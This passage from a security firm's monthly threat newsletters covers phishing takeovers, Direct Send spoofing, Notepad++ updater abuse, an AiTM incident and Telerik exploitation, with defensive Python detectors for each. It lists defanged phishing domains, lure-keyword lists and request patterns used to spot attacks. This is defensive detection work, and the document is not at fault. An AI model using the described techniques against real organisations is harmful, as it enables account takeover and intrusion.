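    {"name": "AllowWeb", "priority": 310, "direction": "Inbound", "access": "Allow", "protocol": "Tcp",
     "sourceAddressPrefix": "Internet", "destinationPortRange": "80-443"},
    {"name": "AllowAllTcp", "priority": 4000, "direction": "Inbound", "access": "Allow", "protocol": "Tcp",
     "sourceAddressPrefix": "0.0.0.0/0", "destinationPortRange": "*"},
    {"name": "AllowOutbound", "priority": 100, "direction": "Outbound", "access": "Allow", "protocol": "*",
     "sourceAddressPrefix": "*", "destinationPortRange": "*"},
]

if __name__ == "__main__":
    for name, port, rule, prio in exposed_mgmt_ports(RULES):
        print(f"{name} ({port}) exposed by rule {rule!r} at priority {prio}")
```

Two things this deliberately surfaces: the deny rule at priority 200 does not protect RDP because the allow at 100 wins first, and the catch-all allow at 4000 quietly exposes WinRM even though nobody wrote a WinRM rule. Allow rules scoped to a specific CIDR are treated as not Internet-facing here; review those separately.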

Abuse of Legitimate Services (Box and Trello) for Phishing and Malicious Document Distribution

Detection: SOC identified potential account takeover activity and suspicious inbox rule creation.

Description: Multiple users received emails inviting them to collaborate on Box. When users clicked the link, they were prompted to reset their passwords. Subsequently, a file was presented on Box which, when accessed, redirected users to a page requesting Microsoft credentials.

Through this technique, the attacker gained access to user email accounts. The attacker then read and downloaded multiple emails and created inbox rules to automatically move emails with subjects containing the keyword “Box” to the “Conversation History” folder and mark them as read, thereby hiding the activity from users. This was followed by additional phishing emails requesting collaboration on different Box files, indicating lateral phishing attempts.

A new tactic observed during this phishing campaign involved the attacker uploading malicious files to SharePoint, leveraging trusted internal platforms to propagate the attack within the organization.

A similar phishing trend has also been observed using the Trello platform, suggesting abuse of multiple legitimate collaboration services to bypass user suspicion and security controls.

Recommendations: Enforce MFA for all users and ensure conditional access policies cover MFA for every user in the organisation. Regularly review and audit mailbox rules. Conduct periodic user awareness training focused on collaboration-based phishing.

Lessons Learnt:
Users should exercise caution when receiving unexpected collaboration or file-sharing invitations, even if they appear legitimate. Trusted services are often ignored or allow-listed by security controls, and attackers are increasingly abusing these platforms to evade detection.
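The mailbox-rule audit recommended above, as an added Python example that is not SecurityHQ's detection: it scores inbox rules for the hiding pattern seen in this campaign (keyword match, move to an obscure folder, mark as read) together with external forwarding and throwaway rule names. The rules are constructed and loosely modelled on Get-InboxRule output; the property names, mailboxes and scoring weights are assumptions.

```python
"""Added example (not SecurityHQ's detection): score inbox rules for the
hide-and-forward patterns attackers create after a mailbox takeover. Rules
are constructed and loosely modelled on Get-InboxRule properties."""
HIDE_FOLDERS = {"conversation history", "rss feeds", "rss subscriptions", "archive",
                "junk email", "deleted items"}
LURE_WORDS = {"box", "trello", "sharepoint", "invoice", "payment", "password", "mfa",
              "security", "suspicious", "hacked", "phish"}


def score_rule(rule, org_domains):
    """Return (score, reasons); 4 or more is worth an analyst's attention."""
    score, reasons = 0, []
    folder = (rule.get("MoveToFolder") or "").lower()
    if folder in HIDE_FOLDERS:
        score += 3
        reasons.append(f"moves mail to '{rule['MoveToFolder']}'")
    if rule.get("MarkAsRead"):
        score += 1
        reasons.append("marks as read")
    if rule.get("DeleteMessage"):
        score += 2
        reasons.append("deletes message")
    for addr in rule.get("ForwardTo", []) + rule.get("RedirectTo", []):
        if addr.rsplit("@", 1)[-1].lower() not in org_domains:
            score += 4
            reasons.append(f"forwards outside the organisation to {addr}")
    words = [w.lower() for w in rule.get("SubjectContainsWords", []) + rule.get("BodyContainsWords", [])]
    hits = sorted({w for w in words if any(lure in w for lure in LURE_WORDS)})
    if hits:
        score += 2
        reasons.append(f"keyword filter on {hits}")
    if len((rule.get("Name") or "").strip()) <= 2:      # '.', ',', '' are classic attacker names
        score += 2
        reasons.append("throwaway rule name")
    return score, reasons


def audit_inbox_rules(mailboxes, org_domains, threshold=4):
    """Return (mailbox, rule name, score, reasons) for every rule at or above threshold."""
    flagged = []
    for mailbox, rules in mailboxes.items():
        for rule in rules:
            score, reasons = score_rule(rule, org_domains)
            if score >= threshold:
                flagged.append((mailbox, rule.get("Name"), score, reasons))
    return flagged


MAILBOXES = {   # constructed, not customer data
    "alice@contoso.example": [
        {"Name": "Hide Box", "SubjectContainsWords": ["Box"],
         "MoveToFolder": "Conversation History", "MarkAsRead": True},
        {"Name": "Newsletters", "FromAddresses": ["news@vendor.example"], "MoveToFolder": "Newsletters"},
    ],
    "bob@contoso.example": [
        {"Name": ".", "ForwardTo": ["collector@mail.example.net"]},
        {"Name": "Cleanup OOO", "SubjectContainsWords": ["out of office"], "DeleteMessage": True},
    ],
}

if __name__ == "__main__":
    for mailbox, name, score, reasons in audit_inbox_rules(MAILBOXES, {"contoso.example"}):
        print(f"{mailbox} rule {name!r} score {score}: {'; '.join(reasons)}")
```

Run this against a fresh export after any confirmed account takeover as well as on a schedule: the rule that hid the "Box" threads is exactly what let the lateral phishing continue unnoticed.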

Threat Detection Engineering

New Detections for this Month

Behavior Analytics Detection for User

This detection leverages MS Sentinel’s Behavior Analytics insights to identify high-risk authentication anomalies where a user logs in for the first time from a new country, uses a new browser, and accesses an application for the first time without a registered device context.

Security Impact:

  • Detects potential account takeover attempts
  • Identifies suspicious login behavior
  • Flags reconnaissance using compromised credentials

Detection Name: Authentication: Behavior Analytics Detection for User.

OAuth Device Code Flow Abuse Detection

This detection identifies suspicious use of OAuth Device Code authentication flow where no device ID is recorded, and Microsoft Graph is accessed. Device Code Flow is often abused in phishing campaigns, token theft, and consent grant abuse scenarios.

Security Impact:

  • Detects OAuth abuse techniques
  • Helps prevent token-based account compromise
  • Enhances visibility into API-based access misuse

Detection Name: Authentication: OAuth Device Code Flow Abuse Detection.
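The two authentication detections above, as an added Python example that is not SecurityHQ's analytics rules: a per-user baseline of countries, browsers and applications built from earlier sign-ins, then new sign-ins checked for a first-seen combination with no device context, and for Device Code flow sign-ins with no device ID that land on Microsoft Graph. The records are constructed and only loosely shaped like Entra ID sign-in logs; the attribute names, users and locations are assumptions.

```python
"""Added example (not SecurityHQ's analytics rules): behaviour baseline and
Device Code flow checks over constructed sign-in records loosely shaped like
Entra ID sign-in logs. Attribute names, users and locations are assumptions."""
from collections import defaultdict


def build_baseline(history):
    """Per-user sets of countries, browsers and applications seen before."""
    base = defaultdict(lambda: {"country": set(), "browser": set(), "app": set()})
    for r in history:
        b = base[r["user"]]
        b["country"].add(r["country"])
        b["browser"].add(r["browser"])
        b["app"].add(r["app"])
    return base


def detect(baseline, records):
    """Return (user, rule, detail) tuples for successful sign-ins that match a rule."""
    alerts = []
    for r in records:
        if r["result"] != "success":
            continue
        no_device = not r.get("device_id")
        # Device Code flow with no device identity, landing on Microsoft Graph.
        if r["protocol"] == "deviceCode" and no_device and r["resource"] == "Microsoft Graph":
            alerts.append((r["user"], "device_code_flow_no_device", r["country"]))
        # First-ever country, browser and application, all at once, without a registered device.
        # Users with no baseline are skipped: 'everything is new' is not a signal yet.
        b = baseline.get(r["user"])
        if (b and no_device and r["country"] not in b["country"]
                and r["browser"] not in b["browser"] and r["app"] not in b["app"]):
            alerts.append((r["user"], "first_seen_country_browser_app",
                           f"{r['country']}/{r['browser']}/{r['app']}"))
    return alerts


HISTORY = [   # constructed prior sign-ins used as the baseline
    {"user": "alice@contoso.example", "country": "GB", "browser": "Edge 122", "app": "OfficeHome",
     "resource": "Office 365 Exchange Online", "protocol": "none", "device_id": "dev-1", "result": "success"},
    {"user": "alice@contoso.example", "country": "GB", "browser": "Edge 122", "app": "Outlook Web",
     "resource": "Office 365 Exchange Online", "protocol": "none", "device_id": "dev-1", "result": "success"},
    {"user": "bob@contoso.example", "country": "GB", "browser": "Edge 122", "app": "OfficeHome",
     "resource": "Office 365 Exchange Online", "protocol": "none", "device_id": "dev-2", "result": "success"},
]
NEW = [   # constructed sign-ins under evaluation
    {"user": "alice@contoso.example", "country": "NG", "browser": "Chrome 120", "app": "Microsoft Office",
     "resource": "Microsoft Graph", "protocol": "deviceCode", "device_id": "", "result": "success"},
    {"user": "bob@contoso.example", "country": "GB", "browser": "Edge 122", "app": "OfficeHome",
     "resource": "Office 365 Exchange Online", "protocol": "none", "device_id": "dev-2", "result": "success"},
    {"user": "carol@contoso.example", "country": "US", "browser": "Firefox 120", "app": "OfficeHome",
     "resource": "Office 365 Exchange Online", "protocol": "none", "device_id": "", "result": "success"},
    {"user": "alice@contoso.example", "country": "NG", "browser": "Chrome 120", "app": "Microsoft Office",
     "resource": "Microsoft Graph", "protocol": "deviceCode", "device_id": "", "result": "failure"},
]

if __name__ == "__main__":
    for user, rule, detail in detect(build_baseline(HISTORY), NEW):
        print(f"{user}: {rule} ({detail})")
```

Requiring all three attributes to be new keeps a travelling user on a known laptop out of the alert stream; the Device Code rule fires on its own because that flow is how a phishing kit gets a token without ever seeing a browser or a device.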

MSXDR: Lotus Blossom Suspicious Network Connection

This detection monitors suspicious outbound network connections initiated by gup.exe to non-approved external URLs and public IP addresses. Events are enriched with geolocation context to enhance investigation.

Security Impact:

  • Identifies Command-and-Control (C2) communications
  • Detects malware staging activity
  • Flags suspicious updater abuse scenarios

Detection Name: Malware: Windows: Lotus Blossom: Suspicious Network Connection Detected.

Windows Suspicious Binary Spawning

This detection identifies suspicious process spawning behavior initiated by gup.exe, excluding known legitimate processes. It correlates unique SHA256 hashes with network activity to detect advanced execution chains.

Security Impact:

  • Detects malware execution chains
  • Identifies secondary payload execution
  • Enhances detection of persistence mechanisms

Detection Name: Malware: Windows: Suspicious Binary Spawning Detected.


Threat Management

SecurityHQ’s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. The following section highlights some key security insights.

Attackers Abuse Microsoft 365 Direct Send to Deliver Internal Phishing Emails

What is Direct Send:

Direct Send is a Microsoft 365 (Exchange Online) feature that allows applications, printers, multi-function devices and line-of-business systems to send email by connecting directly to Exchange Online over SMTP. Unlike authenticated SMTP (SMTP AUTH), Direct Send does not require a username or password; it relies solely on the sender's IP address being permitted, and it can only deliver to recipients inside the tenant.

Microsoft officially supports this method as a low-friction approach for on-premises devices and legacy applications that need to send alerts, notifications or reports. The feature works by routing SMTP traffic directly to the organisation's Exchange Online MX endpoint (for example contoso-com.mail.protection.outlook.com for contoso.com).

How Attackers Exploit Direct Send:

When an attacker obtains or identifies a target organisation's MX record (publicly available via DNS), they can abuse Direct Send to relay spoofed emails through Microsoft's own Exchange Online infrastructure. Because no authentication is required, the attacker can set any "From" address, including legitimate internal employee addresses, making the email appear to originate from inside the organisation.

Image 1: Attack Flow
Why This is Particularly Dangerous
Because the email enters via Exchange Online’s own infrastructure, it can bypass third-party Secure Email Gateways. Standard SPF/DKIM/DMARC checks may pass or be inconclusive since the message transits Microsoft’s own servers. The email appears in the recipient’s inbox with an internal sender display name, lending high credibility to phishing lures.

SecurityHQ Recommendations:

Method 1. Configure Anti-Spoofing Policy in Microsoft Defender

  • Navigate to Microsoft Defender Portal (security.microsoft.com) > Email & Collaboration > Policies & Rules > Threat policies
  • Select Anti-phishing and click the default policy or create a new policy
  • Under ‘Spoof’ settings, ensure ‘Enable spoof intelligence’ is toggled On
  • Set ‘If message is detected as spoof’ to Quarantine or Move to Junk (recommended: Quarantine for high-risk senders)
  • Save and apply the policy to all users or targeted groups
Image 2: Policy Configuration

Method 2. Create a Transport Rule on Exchange Online

Example Conditions

  • Sender is located outside the organization
  • Sender’s domain matches your internal domain (e.g @yourcompany.com)

Actions: Quarantine the message

Exceptions:

  • If the message is received from a specific IP range or any inbound connector (your third-party filtering service) configured in your environment.
  • If the sender is a known service account or relay

Additional Settings:

  • Audit this rule for visibility in message trace and reporting
  • Enable rule mode: Enforce (not test mode)
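The transport rule above, and the Direct Send hardening recommended in the March Cyber Defense Center section, as an added Python example that is not SecurityHQ's rule or Microsoft's code: it applies the rule's conditions and exceptions to constructed message metadata and reads the SPF/DKIM/DMARC verdicts from an Authentication-Results header. The internal domain, relay IP range, connector name and the messages themselves are assumptions.

```python
"""Added example (not SecurityHQ's or Microsoft's code): evaluate the
Direct Send transport rule (internal sender domain arriving from outside,
with relay and connector exceptions) over constructed message metadata.
Domains, ranges, connector names and messages are assumptions."""
import ipaddress
import re
from email.utils import parseaddr

INTERNAL_DOMAINS = {"contoso.example"}
APPROVED_RELAY_RANGES = [ipaddress.ip_network("10.0.0.0/8")]          # printers, LOB apps
APPROVED_CONNECTORS = {"Inbound from Mimecast"}                        # third-party gateway


def parse_auth_results(header):
    """Pull the spf/dkim/dmarc verdicts out of an Authentication-Results header."""
    results = {}
    for clause in header.split(";"):
        m = re.match(r"\s*(spf|dkim|dmarc)=(\w+)", clause, re.I)
        if m:
            results[m.group(1).lower()] = m.group(2).lower()
    return results


def evaluate(msg):
    """Return (action, reason) the way the transport rule would decide."""
    sender_domain = parseaddr(msg["from"])[1].rsplit("@", 1)[-1].lower()
    if sender_domain not in INTERNAL_DOMAINS:
        return "deliver", "external sender domain, rule does not apply"
    if msg.get("smtp_auth"):
        return "deliver", "authenticated SMTP submission"
    if msg.get("connector") in APPROVED_CONNECTORS:
        return "deliver", f"arrived via approved connector '{msg['connector']}'"
    ip = ipaddress.ip_address(msg["source_ip"])
    if any(ip in net for net in APPROVED_RELAY_RANGES):
        return "deliver", "approved internal relay"
    auth = parse_auth_results(msg.get("authentication_results", ""))
    verdicts = " ".join(f"{k}={auth.get(k, 'none')}" for k in ("spf", "dkim", "dmarc"))
    return "quarantine", f"internal sender domain from outside the organisation ({verdicts})"


MESSAGES = [   # constructed message metadata, not real mail
    {"from": "IT Helpdesk <helpdesk@contoso.example>", "source_ip": "203.0.113.9",
     "smtp_auth": False, "connector": None,
     "authentication_results": "mx.example; spf=fail (sender IP is 203.0.113.9) smtp.mailfrom=contoso.example;"
                               " dkim=none (message not signed); dmarc=fail action=oreject header.from=contoso.example"},
    {"from": "Printer <printer-3f@contoso.example>", "source_ip": "10.20.30.40",
     "smtp_auth": False, "connector": None,
     "authentication_results": "mx.example; spf=fail smtp.mailfrom=contoso.example; dkim=none; dmarc=fail header.from=contoso.example"},
    {"from": "Partner <ap@partner.example>", "source_ip": "198.51.100.22",
     "smtp_auth": False, "connector": None,
     "authentication_results": "mx.example; spf=pass smtp.mailfrom=partner.example; dkim=pass; dmarc=pass header.from=partner.example"},
    {"from": "Alice <alice@contoso.example>", "source_ip": "192.0.2.77",
     "smtp_auth": False, "connector": "Inbound from Mimecast",
     "authentication_results": "mx.example; spf=pass smtp.mailfrom=contoso.example"},
    {"from": "App <alerts@contoso.example>", "source_ip": "198.51.100.40",
     "smtp_auth": True, "connector": None, "authentication_results": ""},
]


def decisions(messages=MESSAGES):
    return [evaluate(m)[0] for m in messages]


if __name__ == "__main__":
    for m in MESSAGES:
        print(m["from"], "->", *evaluate(m))
```

The printer case is why the exceptions matter: it also fails SPF and also claims an internal address, and the only thing separating it from the spoof is the source network. Keep that relay range tight, and prefer moving such devices to SMTP AUTH or an on-premises relay so the exception can eventually be removed.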

Threat Hunting

SecurityHQ’s Threat Hunting team conducted hunts focused on general account activities seen in the customer’s environment. The following section highlights the hypothesis, hunts and top actions recommended to the customers.

Hypothesis:

A trusted software update mechanism for Notepad++ (gup.exe) may have been abused to deliver or execute unauthorized code, where the updater-initiated network connections to unexpected external destinations, downloaded or dropped untrusted binaries, spawned anomalous child processes, and potentially established follow-on network communication indicative of command-and-control or secondary payload execution.

Context:

The threat hunt focused on identifying indicators of potential abuse of the Notepad++ update mechanism, specifically examining whether the trusted updater process (GUP.exe) was leveraged to execute unauthorized code, establish persistence, or initiate malicious outbound communication. Because software update utilities are inherently trusted and commonly allowed through security controls, their misuse can enable stealthy execution with reduced user suspicion.

The investigation analyzed process execution chains, child process spawning behavior, outbound network connections, file creation and modification events, DLL loading activity, and security control telemetry across the environment. Attention was given to deviations from expected update workflows, including connections to non-standard domains, execution of binaries from user-writable directories, anomalous process lineage, and network activity originating from updater-spawned processes. The hunt emphasized behavioral inconsistencies rather than reliance on static malware signatures.

Indicators such as abnormal execution chains originating from notepad++.exe, GUP.exe spawning unexpected child processes, connections to unapproved or high-risk external infrastructure, suspicious DLL side-loading patterns, and file drops outside standard installation paths may collectively suggest exploitation of the update mechanism as an initial access or proxy execution vector. These behaviors align with software supply chain abuse, trusted binary proxy execution, and early-stage command-and-control establishment, warranting deeper investigation and validation of application control, network filtering, and update integrity controls.

Threat Hunting Approaches

  • Execution chain integrity analysis across endpoints:
    Process lineage was reviewed to validate expected parent-child relationships originating from Notepad++ and its updater component (GUP.exe). Focus was placed on identifying deviations from the normal execution flow (notepad++.exe → gup.exe → update.exe), as abnormal branching into scripting engines, system utilities, or unrelated executables may indicate proxy execution under a trusted application context and potential compromise of the update workflow.
  • Compromised update traffic monitoring:
    Outbound network connections initiated by GUP.exe were analyzed to determine whether update traffic resolved to legitimate and historically observed infrastructure. Connections to non-whitelisted domains, direct IP-based communication, anomalous geolocations, or newly observed external destinations were reviewed, as manipulation of update traffic can enable delivery of unauthorized payloads while blending into legitimate HTTPS activity.
  • Unauthorized child process spawning behavior:
    All processes spawned by GUP.exe were evaluated to detect execution of command interpreters, living-off-the-land binaries (LOLBins), or executables launched from user-writable directories. Since update utilities should execute only controlled installer components, deviations from expected child process behavior may signal abuse of the updater as an execution proxy for malicious code.
  • Network activity originating from spawned binaries:
    Network telemetry associated with binaries launched by GUP.exe was correlated to identify potential secondary payload retrieval or command-and-control communication. Non-browser processes initiating outbound HTTPS sessions, repeated beacon-like intervals, or communication over uncommon ports were examined, as these behaviors may represent post-exploitation activity following initial execution.
  • Suspicious file creation and modification review:
    File system events triggered by GUP.exe were analyzed to identify executable or DLL drops outside standard installation directories. Attention was given to files written to AppData, Temp, ProgramData, or other user-controlled paths, as such locations are commonly used for staging payloads or establishing persistence. File creation events immediately followed by execution were treated as elevated risk indicators.
  • Security control telemetry correlation:
    Endpoint protection and application control logs were reviewed to determine whether update-related activity triggered antivirus detections, execution blocks, or policy enforcement events. These signals provide insight into attempted abuse, even when controls successfully prevent full execution, and help differentiate benign update behavior from blocked malicious activity.
  • Known IoC and hash validation:
    Network destinations and file hashes associated with update activity were cross-referenced against known threat intelligence indicators. Matches to known malicious domains, IP addresses, or SHA256 values were treated as high-confidence compromise signals. Even in the absence of direct matches, behavioral anomalies were assessed to account for potentially novel or modified infrastructure used by adversaries.

Recommendations: Based on the observed threat landscape, the following actions are recommended:

  • Validate and standardize Notepad++ installations:
    • Identify all endpoints with Notepad++ installed, including version and installation path.
    • Verify that all instances are running the latest official, patched version obtained from trusted sources (official Notepad++ site or verified GitHub releases).
    • Replace or reinstall any instances where:
      • the version is outdated or unsupported
      • the installation source cannot be validated
      • binary hashes do not match known-good releases
  • Restrict plugin installation to approved plugins only.
  • Remove unused or legacy plugins that may introduce additional risk.
  • Remove Notepad++ from systems where it is not business-justified.

Incident Response – Success Story

Overview

An illicit OAuth app consent phishing attack targeted the user [email protected] (anonymized name), leveraging an Adversary-in-the-Middle (AiTM) technique to capture an active authentication session. SecurityHQ's IR team was engaged at a later stage of the attack. The compromise resulted in unauthorized access to Microsoft 365 services, MFA manipulation and mailbox data enumeration. Incident response ensured that the impact was limited and policies were hardened to prevent similar incidents.

What Happened
The attack began when the user clicked a malicious URL embedded in a phishing email.

Upon clicking the link:

  • The user was initially redirected through legitimate security gateways:
    • Outlook Safelink
    • Microsoft SmartScreen
    • Mimecast Protection
  • Despite multiple security warnings, the user manually overrode all warning pages.
  • After bypassing the protections, the user was redirected through the following malicious infrastructure chain:
    • hxxps[:]//raspy-sea-7139[.]sadiri1121-7b0[.]workers[.]dev
    • cforca[.]group
    • challenges[.]cloudflare[.]com
    • autologon[.]microsoftazuread-sso[.]com

All redirections occurred within an active Microsoft Edge (msedge) session on the host.

Because the user already had an authenticated Microsoft session in the browser, the phishing infrastructure was able to intercept and capture the authentication session token — successfully executing an Adversary-in-the-Middle (AiTM) attack.

To maintain persistence, the attacker:

  • Reused the same session ID
  • Accessed:
    • OfficeHome
    • My Profile
    • My Sign-ins
    • One Outlook Web
  • Added a new MFA device labeled “NO_DEVICE”

Threat Actor Attribution (Assessment):

The infrastructure and attack pattern strongly align with modern AiTM phishing kits such as:

  • Evilginx-style reverse proxy frameworks
  • OAuth token harvesting phishing campaigns
  • Cloudflare Workers–hosted phishing redirectors
  • Use of:
    • Cloudflare challenge pages
    • Azure AD SSO lookalike domains
    • Malicious SharePoint-themed phishing landing page
    • Session replay activity post-authentication

This suggests an organized phishing-as-a-service (PhaaS) operation rather than a targeted state-sponsored campaign. Attribution remains financially motivated cybercriminal activity leveraging AiTM phishing infrastructure.

The SecurityHQ IR team successfully responded to the incident, limiting its impact, and carried out the necessary response actions, including hardening of existing security controls to prevent future recurrences.

Key strategic controls that can prevent similar incidents in your environment:

  • Enable token protection policies
  • Restrict MFA device registration
  • Implement impossible travel detection tuning
  • Deploy Defender for Cloud Apps session control
  • Monitor for AiTM indicators (reverse proxy patterns, Cloudflare Worker abuse)

Multi-Stage Redirect Chain Design

The redirection sequence:
Workers → cforca.group → Cloudflare challenge → azuread-sso lookalike → malicious SharePoint

This is a professionally designed phishing flow, not a low-effort scam.
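As an added detection example (not part of the original write-up), the following Python flags the two post-compromise indicators described above, a session ID presented from a second IP address and an MFA method registered shortly afterwards, over a constructed, simplified sign-in/audit export. The field names, thresholds and sample values are assumptions, not the Entra ID export schema.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional

# Constructed, simplified sign-in and audit events (not the Entra ID export
# schema; a real export would be mapped into this shape). All values are samples.
SIGNINS = [
    {"time": "2026-02-10T08:02:00", "user": "user@example.com", "session": "S1",
     "ip": "203.0.113.10", "app": "OfficeHome"},
    {"time": "2026-02-10T08:41:00", "user": "user@example.com", "session": "S1",
     "ip": "198.51.100.77", "app": "My Sign-ins"},
    {"time": "2026-02-10T08:43:00", "user": "user@example.com", "session": "S1",
     "ip": "198.51.100.77", "app": "One Outlook Web"},
    {"time": "2026-02-10T09:00:00", "user": "other@example.com", "session": "S2",
     "ip": "203.0.113.10", "app": "OfficeHome"},
]
AUDIT = [
    {"time": "2026-02-10T08:45:00", "user": "user@example.com",
     "activity": "User registered security info", "device": "NO_DEVICE"},
]


@dataclass
class Finding:
    user: str
    session: str
    original_ip: str
    replay_ip: str
    mfa_device: Optional[str]  # device registered shortly after the replay, if any

    @property
    def severity(self) -> str:
        # A replayed session that goes on to register an MFA method is the
        # persistence step described in the write-up, so it is rated higher.
        return "high" if self.mfa_device else "medium"


def find_session_replay(signins, audit, window=timedelta(hours=2)) -> List[Finding]:
    """Flag a session ID first presented from one IP and later presented from
    another, and attach any security-info registration that follows within `window`."""
    first_seen = {}   # (user, session) -> ip of the first sign-in
    flagged = set()   # (user, session) pairs already reported
    findings = []
    for ev in sorted(signins, key=lambda e: e["time"]):
        key = (ev["user"], ev["session"])
        t = datetime.fromisoformat(ev["time"])
        if key not in first_seen:
            first_seen[key] = ev["ip"]
            continue
        if ev["ip"] == first_seen[key] or key in flagged:
            continue
        device = None
        for a in audit:
            ta = datetime.fromisoformat(a["time"])
            if (a["user"] == ev["user"] and "security info" in a["activity"]
                    and t <= ta <= t + window):
                device = a["device"]
                break
        findings.append(Finding(ev["user"], ev["session"], first_seen[key], ev["ip"], device))
        flagged.add(key)
    return findings


if __name__ == "__main__":
    for f in find_session_replay(SIGNINS, AUDIT):
        print(f.severity, f)
```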


The post Managed Defense Threat Insights: February 2026 Newsletter appeared first on SecurityHQ.

Managed Defense Threat Insights: January 2026 Newsletter https://www.securityhq.com/blog/managed-defense-threat-insights-january-2026-newsletter/ Thu, 05 Feb 2026 06:10:18 +0000

The post Managed Defense Threat Insights: January 2026 Newsletter appeared first on SecurityHQ.

Cyber Defense Center

Critical IIS Server Compromise via Telerik Web UI Vulnerability

Detection: Use case triggered on certutil being used to download a payload on the affected server.

Description: Threat actors have been observed actively attacking vulnerable IIS servers by exploiting a known vulnerability in Telerik UI for ASP.NET AJAX, tracked as CVE-2019-18935. The exploit abuses unsafe deserialization in the endpoint.

Attackers can upload and run arbitrary code on the compromised IIS server by taking advantage of this vulnerability, resulting in remote code execution (RCE). If exploitation is successful, adversaries can obtain an initial foothold, launch web shells, execute malicious payloads, and possibly move laterally inside the environment.

In the observed incident, threat actors abused the vulnerable WebResource.axd handler to bypass authentication controls and execute malicious commands in the context of the IIS application pool. This often resulted in persistent access, unauthorized file uploads, and follow-on activity such as credential harvesting or deployment of additional malware.

Recommendations: To strengthen the overall security posture, the SecurityHQ IR team recommended immediately patching Telerik UI to a fixed version provided by the vendor. The team provided all available Indicators of Compromise (hashes) to be blocked in Trend Micro and also shared detection criteria for identifying similar instances, recommending the creation of a custom detection rule in other EDR tools.

Lessons Learnt: Organizations should patch critical vulnerabilities immediately. IIS web servers hosting public applications are attractive targets for attackers. Third-party components require the same patch discipline as OS updates. Continuous monitoring and hardening of these assets are essential. Enforcing least-privilege access (e.g., restricting write access to application folders) can significantly reduce attacker capabilities.

SharePoint & E-Signing Phishing Emails Impersonate Trusted Services to Steal Credentials

Detection: The client reported a possible BEC attack due to a suspicious email sent to vendors; SOC monitoring for the client was handled by another MSSP.

Description: The attackers impersonated widely used file-sharing and electronic signature services, including SharePoint and e-signing platforms, crafting emails that closely mimicked legitimate notifications — complete with official-looking logos, headers, and “Review Document” buttons — to increase authenticity.

To evade detection and increase trust, all malicious links were routed through trusted redirect services (most commonly Mimecast’s secure-link rewriting domain), making the URLs appear legitimate to both users and automated filtering systems.

The campaign primarily impacted sectors that routinely exchange contracts and financial documents — including consulting, technology, construction/real estate, healthcare, finance, manufacturing, media/marketing, transportation/logistics, energy, education, retail, hospitality/travel, and government — underscoring the effectiveness of this social engineering technique at scale.

Recommendations: Enforce stronger MFA methods for authentication instead of text- or call-based methods. Revoke all active sessions and reset passwords for affected users. Lastly, user awareness and phishing training were recommended for all end users.

Lessons Learnt: No impersonation policy was in place between sister companies, allowing the emails to bypass users and automated filters. Multi-layered defenses, including MFA, email security controls, and user awareness, are essential to reduce compromise risk.


Threat Detection Engineering

New Detections for this Month

The use case for certutil being used to download a payload on an affected server led to the identification of potential vulnerability exploitation associated with Telerik, which in turn led the Threat Detection Engineering team to create the specific detection use cases below:

Telerik Exploitation

This detection identifies potential exploitation of vulnerabilities in Telerik UI for ASP.NET through malicious POST requests to the WebResource endpoint, often abusing the type=rau parameter to upload malicious files or trigger unsafe deserialization.
Successful exploitation may lead to remote code execution, deployment of web shells, persistent unauthorized access, lateral movement within the network, and potential exposure of sensitive data, making early detection critical to preventing full server compromise and operational disruption.

Detection Name: (AUTO) Global: Exploit: Telerik Exploitation Attempt Detected (P2)

Telerik exploitation is almost always visible at the web layer first. This use case allows us to detect the exploit attempt, validate success, and trace the full attack path from HTTP request to system compromise.
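An added example, not SecurityHQ's own detection content, of the web-layer check this use case describes: parsing W3C-format IIS logs and summarising, per client IP, requests to the Telerik WebResource handler that carry type=rau. The log excerpt is constructed sample data.

```python
from urllib.parse import parse_qs

# Constructed W3C-format IIS log excerpt (sample data; IIS writes spaces in
# user agents as '+', so every field is a single whitespace-free token).
IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2026-01-12 10:14:02 10.0.0.5 GET /Default.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) 200 15
2026-01-12 10:14:09 10.0.0.5 GET /Telerik.Web.UI.WebResource.axd type=rau 443 - 198.51.100.20 python-requests/2.31 200 3
2026-01-12 10:14:11 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 198.51.100.20 python-requests/2.31 200 812
2026-01-12 10:14:12 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 198.51.100.20 python-requests/2.31 500 1204
2026-01-12 10:15:30 10.0.0.5 POST /upload.aspx - 443 jdoe 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) 200 40
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the most recent #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-align columns
        yield dict(zip(fields, values))


def is_telerik_rau(rec):
    """True for requests to the Telerik WebResource handler with type=rau."""
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "")
    if query == "-":          # IIS writes '-' for an empty query string
        query = ""
    types = [v.lower() for v in parse_qs(query).get("type", [])]
    return stem.endswith("telerik.web.ui.webresource.axd") and "rau" in types


def detect_telerik_rau(text):
    """Summarise per client IP: GET probes, POST uploads and their status codes.
    Every POSTing source is reported; whether the handler should be reachable
    at all is something the analyst validates against the application."""
    per_ip = {}
    for rec in parse_w3c(text):
        if not is_telerik_rau(rec):
            continue
        entry = per_ip.setdefault(rec["c-ip"], {"gets": 0, "posts": 0,
                                                "statuses": [], "agents": set()})
        entry["agents"].add(rec.get("cs(User-Agent)", "-"))
        if rec["cs-method"].upper() == "POST":
            entry["posts"] += 1
            entry["statuses"].append(rec["sc-status"])
        else:
            entry["gets"] += 1
    return {ip: e for ip, e in per_ip.items() if e["posts"] > 0}


if __name__ == "__main__":
    for ip, summary in detect_telerik_rau(IIS_LOG).items():
        print(ip, summary)
```

A flagged source is then pivoted to host telemetry on the same server (process creation under the application pool identity, such as the certutil use that triggered this use case) to validate success.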

Deserialization of Untrusted Data vulnerability in Sitecore Experience Manager (XM)

CVE-2025-53690 is a critical security vulnerability affecting multiple Sitecore products, including Sitecore Experience Manager (XM), Experience Platform (XP), and related components through version 9.0. It stems from a deserialization of untrusted data flaw that allows attackers to execute arbitrary code remotely.

